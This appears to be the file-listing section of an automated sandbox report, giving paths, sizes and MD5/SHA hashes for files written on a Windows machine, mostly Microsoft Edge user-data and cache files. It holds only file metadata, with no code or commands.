C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57f405.TMP
Filesize48B
MD50137cc8c41ef78d807f6630dd8f5c300
SHA166fdfa830bdd3b437952dd81c790cfbeafee06ba
SHA256233369a3112a51adebaf09aca3a51008834db4481c94abe942aa299ecffd8e15
SHA512b77023f204e2c5d04009f0fe7a165931a6febbe13160c8bb1f55ac4445e95237f4e5000dceb05dae9c4c2bafb2cd06bdde5219271571eb33ffa95f3555854d93
-
Filesize
4KB
MD5a025da0ebcf89247ff9b629cf9102d84
SHA16edb404e1e926439e927c76de4797fa4e39100b3
SHA2566a987bcb93b542e404cdb5996a911a818e3ac3c9fcd9fa5e0903a16f137bc21e
SHA5129880b122b449fcf43609991ba8bfe0c1acb271a654d20ebb9e59ed96e11efd89ae034acd939c49e0fbb798a41195282e56f5cc1e6387362de0deb863f242499a
-
Filesize
880B
MD584c60ede10b92218eb715af214f2d336
SHA1c4bda62ada9f29dd38e38c615fffc2dde4ba7287
SHA256f05d8562c71aa0caf758bf60f7453213eba2ab3d87aafbe11b4e7efeb3100f7b
SHA51264326adaf1a4a904840807f40d33e46dad815522f0e88f3bd5ca31f6cb35b87f6927c050c7ec25c1fe1dfe71da036bb195c015e5e0a9b040e24782f697fff5ea
-
Filesize
23KB
MD552ad489a9df9a6992472b9dc93dc0bbf
SHA1cf619e5fac29004ad31894a2768e9a5d79a1bfdd
SHA256a7cdcf9de105c4bc84d0a77242f38240195fe87fa5522168523407afbe800ed0
SHA5126323de92a6a94538e5f48eacab8d77e8310b5e956a5b448dcad6c412eddea6c3321a98866539ab6ca9a37772702637de2e24148eb14ae3184e0030a49fdcb98a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog~RFe5843ea.TMP
Filesize469B
MD5053fcd7b7eeffc66d85205926d5b35e1
SHA163d10e2d8e9f7693d8244b458e78be5061abe5aa
SHA256f5e045b791b276b030597ffe069ef75e3968267584f3c94853aa3a21cc5150c2
SHA51269a08dedaf4e1cb998a32fe4dd1a5818f43ed5a666e9c342c7dffb2ec94b7f5d400851b647bdf4297d4d48a4fc33679168ffda6b0a09af7ad6514228c46cdd0b
-
Filesize
22KB
MD53bca8411b45106afaa963d562c371631
SHA178857d33a65e7061ca18a3540c304f01e7e85325
SHA2564503345ee70aa9ca0f90012b665743d7c13ec7052e7a943222287973b752b9c7
SHA512a6a7e9af6613a30730a0b87be76f87144a3483afb756445d462de7b22543027e5e8f5822e0337ba2d7b65e413e526da962783d05d226c0d13d113d57d28b56ff
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig~RFe58435d.TMP
Filesize3KB
MD522ed3cc04fcc2e66b81335c4395971fd
SHA112ef48d70ec6f360644d2573dde99756f6ac05fb
SHA25627bffcff6642dfcb87ac33eea61059552bc35ccd3c0d9f4da550398351836df9
SHA5129219928d246a8aa761ee289b0baacc7214b028976b1b890c7f1df38ecac61cb3a90e8af1b3861929155d07af304d58ae8f7304466769669a7cd40c55ae61cf40
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Data Protection Lists\2.0.0.0\office_endpoints_list.json
Filesize3KB
MD594406cdd51b55c0f006cfea05745effb
SHA1a15dc50ca0fd54d6f54fbc6e0788f6dcfc876cc9
SHA2568480f3d58faa017896ba8239f3395e3551325d7a6466497a9a69bf182647b25e
SHA512d4e621f57454fea7049cffc9cc3adfb0d8016360912e6a580f6fe16677e7dd7aa2ee0671cb3c5092a9435708a817f497c3b2cc7aba237d32dbdaae82f10591c3
-
Filesize
39KB
MD57af15b9000f4b4507e25a5c920358949
SHA1b0cbff7d068dc4166d833e2b75aa9903f992c294
SHA2566429a035c6cfdd6c7aeb5a902e38fbd670904ec3b574d8fa90def4796b8a8919
SHA512304757ad782118ed3e702b7fb9e8f3815149db13bfe04d2afec8ced6a3c9151111bd7d67c6bf45c785328f93334631bb09ae72f062e677abd50b324d1103a98a
-
Filesize
39KB
MD5855f7abcffd8848f3ddaa3032073b361
SHA106f2122e813f346dd1023f3844984262e4048699
SHA2561a31571518c6b1ea91c155239ac7798cc30373f21c5d9f36bf23800d62efa8f3
SHA51241fa37b11584711defd3951f49ddf3761d151ef05838944efe754f5140584a070a9ea731a0e133ead36e5a59bcf0753aac40744cdb2f994a2e39803b6aca2aaf
-
Filesize
29KB
MD584614b13d358af20a58da2b2e90b671e
SHA1b3ccb056457d2c2bf7639372dbcecd5e5b9f29e0
SHA25672e1fe9dc4e6990cfd9636823254eba771fcaa03d35a1c53d20c9427cf5bece1
SHA512b8b29b202bf68e8b1a1b97d2e7c11497eeaa46401998eb9fb09f074a2b144234ea9d4f9692c8d1abe09cde06b71c475cdf88ac5e7858d69955d5508f9bd79d49
-
Filesize
40KB
MD5b2c78e26cf8c84dc3583a3258a3c5b54
SHA1c5e5138a43bda7d29e9f940c57712aa3515ddc83
SHA256530215a5f0c7e6f12b0315c7ae5323ff683b1279febe9bf1d7df04e829e88af5
SHA512fec1c2582cdd703ed032a435dbbad0f7a0794be739b8c8ef85e2caab35a64960472f77b5114a64d772c1f85673bb0118b8c9e82dfc050a2d60cbe1f54d762f80
-
Filesize
7KB
MD5a7bd3d5922ae81414e7944b805a7d35a
SHA1e46d09db68c10c1fa46f3e38f65ab8263bcebc5c
SHA256bf1e815460636c7eedf53bcf4ce784779c762d894954dc17c5fd6cec76a13695
SHA512d14a13dddf68d10b0f593ae574e8e80c53e62ca6cf873c730ae34c87a434c1caa74bfa0ce8789ab050beabfa80d323c5dad416cc28c7fb169f9e664f1c2ce030
-
Filesize
29KB
MD55c77f65888afe6d631778cefd95a9a41
SHA1b3ff5bc7528b1ab4af9a9d337da3e412cff53923
SHA2568142ec00e48057ef3e20468a14e75349e0a1a32bf1bc8a4510bbf5236fe5b4e1
SHA51210885f53f9c3500b508d2ba4df79dfe2201071a1111c71cea844be65a9b7cfcc7e0c98968465159d7540a5eac13901719a4280c07c7b908b872a716fe5ee7a7d
-
Filesize
40KB
MD5c4cbaf551267b48b2bbecf73dbb170fa
SHA19e294ab4b33e5c7c8e0047e6a726d7bca6685fef
SHA256217c0349229460479b90297f4ba8d3363c87a03a2387b95f847829d79318babd
SHA5125855b35404fdd4421b604227b8b6321900ae6c82f5b066988c171c52c4ebb0a7cc4400e55570f56682f65230154793e1a4fb04231885ebf0cad3a511273cdb9c
-
Filesize
6KB
MD5cf1d30ca2332aa18881b260bba9417f1
SHA1a8dc7686399154740a107526f533f6ecdb071137
SHA2565fb81b7f6083c821a5f8e1e3ff9783dd3d808bb5a7edcac8ad94441a6c101824
SHA512c6c07d6593dd645640165a5e76b7662d5af298f9a3781c44950b9bf330cb4f58d0939624625148c3bd90e13acf563f6c55091e27ed7f55ffe31545f2ca1b3d9b
-
Filesize
39KB
MD52c0a33808d7f6b8a0aee903434f14e74
SHA1983f7156d76b8408e9ef673ef5fbc241c6ae947a
SHA2562ac6d78e00d5a5dc42d25ef38f61c8319eb7e65dac4997ec0dd10b34f6035baa
SHA512d206e53e1533f9bc77515835b55e21863f0f1cdf0cd947568d00b7fada5353ac698cb4db3c1240addb6f6fff081ce6f351df182b8c1f611b8e6faa84f2fd7ab3
-
Filesize
39KB
MD57d7066318ee1e0b8d4709626b89d443a
SHA143dfecc1f1c6cdf4fb02b496d42930b8c13957db
SHA256fbd2d22c5313e9704dbd12c3248a57b46854b10b3e42ce369e133d87ce246c44
SHA512906bd38a79f22ff68702d7ed34b08daa35033760385447f43184917c9b81956cd0c12c5c6a5907e8ed947924c6d58b31810464a37b06902ea8b3346c30c227fb
-
Filesize
392B
MD56086742a691db566b3d402142b81fb41
SHA14e4fae5bd63eb6a616d72ace7b1ffb5d71d81d3c
SHA256c2db2a7300eb89bd40c7e48089a1b2585d9344a5b932c5897aaa9ab4783be235
SHA512d14bcd68a934788a9fd530c85cd66292b7d6e1c2027183e8dc035139cdbeae5690ff5c02a71a5c8bb480c9b75b006bfc337f1fe7d27b994bd1f1a00ecef8f4c1
-
Filesize
392B
MD550637954d77a6b8865002d1d51400e92
SHA1206fa223982c7997251b73b2cab11fa6061fe660
SHA2563443afc6c1a126e6b45dc09fdce216a904ac7d3e943ff3c3499a633c3c3f9f3d
SHA512eabb0e21c75232b037fcbd4c955c2f3ef32f56c12762bec3679d2d42c37851c4acb7abb1621f3cd123b8ffc2972c7f46fc1c26b31d63f3e512246d7640eb0736
-
Filesize
392B
MD5d3069d59486de0b93bad6134e48a9f77
SHA1640791c7a7c52d9c4420be7401b6251ba338efbc
SHA256a5da0107e0f747d3aac2dcd0d0cf53ee6f61a3ff4b5eb1ebbc47fe96b25a606e
SHA5123d7c12d165fd609c33e5a731e8dd07ec60becc0ffac441bb70d9d454b5833951bc831720d84c86cfb76f59d8eadb71b2849f4d0f16b7dcbd5be4930c3beb6028
-
Filesize
392B
MD53af0951ff4aa8c5be8b53b45df7bd36b
SHA1171ea125df08e75c784b23edd391e67cb2ba51f8
SHA2569c21000f3d5fe01d89a0f2e5b0d8fba024c4c089c0a9e3a5a459515d24720f32
SHA512ce0d92cbac522e1f372a5f0db1c8b00b811b8905f79c77243f0390ce2128fafa950281a4ede58c35ec786c54c20da57f2438e144e8071cefc5170fc3c0d61cfb
-
Filesize
392B
MD5d81dc824b89d0f501e29061598284d29
SHA131e504d4bba10bdad8cc97c877016dd00582c804
SHA25631c23b44f5046ab8b2643b00a3d8ff7588fedb5a853da56282b640a7c07c12c1
SHA5125c9beec15e1c042eca196bec849e634d1132c330164c5ed28d887506ba6cdae80afe771149f3a0448f3d392909867ce3702480eaa6beba85dce039fb0adafe20
-
Filesize
392B
MD550a9820a954fe2d36ec3be45d8db4f92
SHA1e346e5ccc0a51e4106072722a1edf6b994c457a7
SHA256ee06dc0ad23b086e752f38adaa2c7a394ac50cb244ee38067c6d6929cb9a7c22
SHA5120450bff4538ff03e3083c6ed0c754048927b23bdfa2177509c78e1bda61937bb1558bfee2977ec058887248b28fcc9b06106a65351821522438f5670631ad6e4
-
Filesize
392B
MD56c757174223ac5941a72c5993462fcbe
SHA19e759f7b7256f3cd7c7e0ca4935c4aa0f256c401
SHA256491fdf1fd94e026ecf93e468d9836d18f9c407407364268cde8091e20c741b38
SHA5127541d0e361d7390dd7d4654b0b1431c22257e16f8c1832333d36d7f0ae95fe3a38e206dce044c10d2ad9c827a7d62dbb355dbf2d08fb2c068bc4e528d6cc74e0
-
Filesize
392B
MD5aa09337019e09f44c09d1951e82f26d8
SHA138bd6301adfe6e248d3570a43e78be875b0493ca
SHA256222dc494fa24b738863ab79c9db5a9901c721ab802c9a88ea45c59fc0c2b8468
SHA512148f614ebdb9cb4a307e7dd2ae445ae44414b078e027f10faf37900d1787b5ca652de2559f5985ccb0609aff66cb22ca6182fb9dddc0e1b6934a353e35d1d034
-
Filesize
392B
MD5aab1906aec0ac45b56f690d6f36f1953
SHA166fbf746648bc7618957e89510208cc91ba4be4c
SHA2560ee38432112c4f1ca7ed589f1ce65aa30aab6a905e0894fd069c1aca14df492f
SHA5127a53ecfcec48a7b4bf94d5f0d38ed4fd0fcf0782467d1741ed4e47e514adfd6322e464e3311aa22c49cf67a3714f44526fed145ba6206a6dadebdc32903f0b37
-
Filesize
392B
MD5104902de9fde31bfbb5b72800347791c
SHA14a296ab69f58f5f2fcd183b5934e72761dcefb7f
SHA256869db1b2f0f9229b76b1337d976911b9f3d56a9e07f2068a7d0abd4901cf940f
SHA51293b1e39bd0b5a4f9c8f943eb2cfcf8da1f791d0ce14ce8c6b16b3420f7d979a931d9da2caeccc0976b9317ad4c886be321ac231a9efe959b80977f82ab82d0b9
-
Filesize
392B
MD5ea05c6b44fbc6cef0216798e455c60a2
SHA19ef3efbd93cb53f324c31a76563f7c0e1abeb747
SHA256f5ba5e1582687fc1da53257a2be9ecda811061bffe5d41e02233e118bc43ac47
SHA5120a96cde7e8ba6434c54c9ce20771beb2173422c29cc440d11fb6c3a907793a9d147dbcc3ff9a240c2adfcf87355c3d96f012576f5bd8c301702cdfa88142a844
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2025.5.15.1\keys.json
Filesize7KB
MD503f15dff10ac451682f8a308674ddf77
SHA1c723e23c49bed8a52b8f947b2cb8879a110fc94b
SHA256f967e18d5b1839ba801212f032e7e6dd92f7ba6958bc3ae9b122d9fadf2b1bf4
SHA512df8fdc89cc1e6f2edce49b41bd9f71dc7f7a8daab40f1355415119f9c0a0d5067337d966472ad49f855ecb9a89bee8d1711d8a869589a03e469530ee8d7e0f3e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Typosquatting\2025.5.9.1\typosquatting_list.pb
Filesize67KB
MD5a50b46aa311787328482750c251d2633
SHA1eaa327f9a89e5ec13301979f4ce49a36fc871049
SHA256019b9efc88e3e5939912472d7a9e43a8d9b675fff7ebf9b7b445042f6de4b721
SHA512a6820b29aa645abebeca3683ceb91372d69d8e589859e03f653ad6b2f3470ce2248603ce265c5d11f3da4833776d22493f3371e8e297591b678fa364bb5dc149
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent\1.0.0.5\nav_config.json
Filesize2KB
MD5499d9e568b96e759959dc69635470211
SHA12462a315342e0c09fd6c5fbd7f1e7ff6914c17e6
SHA25698252dc9f9e81167e893f2c32f08ee60e9a6c43fadb454400ed3bff3a68fbf0d
SHA5123a5922697b5356fd29ccf8dcc2e5e0e8c1fd955046a5bacf11b8ac5b7c147625d31ade6ff17be86e79c2c613104b2d2aebb11557399084d422e304f287d8b905
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD59909f25844a1ac13b891bf462008cc5a
SHA162a89cf9811ec7836d31ae1cfcadeea40d449262
SHA25630f323427ba600b0f21e8688973f0521d909ae20004238a4b37a8af67892af88
SHA512abb2b081701327aef555d5ece7d883473bb604ac92e6d94986f26d12a348a35ff9c2d06de93aa746b6f7ed3fa6ced66366882c73172315c2e7503cd82c40d782
-
Filesize
1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
10KB
MD578e47dda17341bed7be45dccfd89ac87
SHA11afde30e46997452d11e4a2adbbf35cce7a1404f
SHA25667d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550
SHA5129574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
61B
MD5398a9ce9f398761d4fe45928111a9e18
SHA1caa84e9626433fec567089a17f9bcca9f8380e62
SHA256e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1
SHA51245255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b
-
Filesize
381KB
MD5ec0f9398d8017767f86a4d0e74225506
SHA1720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484
-
Filesize
4.5MB
MD5f9a9b17c831721033458d59bf69f45b6
SHA1472313a8a15aca343cf669cfc61a9ae65279e06b
SHA2569276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce
SHA512653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8
-
Filesize
153KB
MD5cc05ed3e66468e692745ba6563c69740
SHA1eae9dbd4d36aa91fd43f7d452ac3d252b103759d
SHA256fb1311fb7142825abacb3c7aedddf948f5c9b258e447c953ce0f7f4b19c6dfff
SHA5124b527db02d6ea36b914558a3e44fd3d15772bf2be4ba0a640bf70427af07dcde5ed6967930cc3624a244cfc82290f125eea2754812586216b3d5a37757ce8db4
-
Filesize
10.0MB
MD55df0cf8b8aa7e56884f71da3720fb2c6
SHA10610e911ade5d666a45b41f771903170af58a05a
SHA256dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360
SHA512724ce5e285c0ec68464c39292be62b80124909e98a6f1cd4a8ddee9de24b9583112012200bf10261354de478d77a5844cb843673235db3f704a307976164669a
-
Filesize
2.4MB
MD57e76f7a5c55a5bc5f5e2d7a9e886782b
SHA1fc500153dba682e53776bef53123086f00c0e041
SHA256abd75572f897cdda88cec22922d15b509ee8c840fa5894b0aecbef6de23908a3
SHA5120318e0040f4dbf954f27fb10a69bce2248e785a31d855615a1eaf303a772ad51d47906a113605d7bfd3c2b2265bf83c61538f78b071f85ee3c4948f5cde3fb24
-
Filesize
2.7MB
MD548d8f7bbb500af66baa765279ce58045
SHA12cdb5fdeee4e9c7bd2e5f744150521963487eb71
SHA256db0d72bc7d10209f7fa354ec100d57abbb9fe2e57ce72789f5f88257c5d3ebd1
SHA512aef8aa8e0d16aab35b5cc19487e53583691e4471064bc556a2ee13e94a0546b54a33995739f0fa3c4de6ff4c6abf02014aef3efb0d93ca6847bad2220c3302bd
-
Filesize
141KB
MD5de8d08a3018dfe8fd04ed525d30bb612
SHA1a65d97c20e777d04fb4f3c465b82e8c456edba24
SHA2562ae0c4a5f1fedf964e2f8a486bf0ee5d1816aac30c889458a9ac113d13b50ceb
SHA512cc4bbf71024732addda3a30a511ce33ce41cbed2d507dfc7391e8367ddf9a5c4906a57bf8310e3f6535646f6d365835c7e49b95584d1114faf2738dcb1eb451a
-
Filesize
48KB
MD5ab3e43a60f47a98962d50f2da0507df7
SHA14177228a54c15ac42855e87854d4cd9a1722fe39
SHA2564f5f0d9a2b6ef077402a17136ff066dda4c8175ceb6086877aaa3570cabb638f
SHA5129e3365c7860c4766091183d633462f1cc8c30d28871ae2cd8a9a086ce61c0bccf457f919db6826b708f0cf4f88e90f71185420edc4756b7d70137e2096f8797f
-
Filesize
93KB
MD591ae1cf52d45ea7789d69b22e25a5dfd
SHA1633e304b8038696a12116198a5f7585304705ba4
SHA2565ede962a9282e255f9efe5a554c89e8f60cf6c11c045d9662a46e34067735998
SHA512a0e4b25188e5e180988f8573f09d390ccdf0d332bc1ad8afa83e18b5aee178936d09fd862413b62d19653f7ce61f70e597e95e09beb03b2ddaa70dac9a34fe18
-
Filesize
4KB
MD5abf47d44b6b5cd8701fdbd22e6bed243
SHA1777c06411348954e6902d0c894bdac93d59208da
SHA2564bc6059764441036962b0c0ec459b8ec4bb78a693a59964d8b79f0dc788a0754
SHA5129dcadf596cc6e5175f48463652f8b7274cd4b69aaf7b9123aa90adc17156868fce86b781c291315a9e5b72c94965242b5796d771b1b12c81d055b39bf305ac77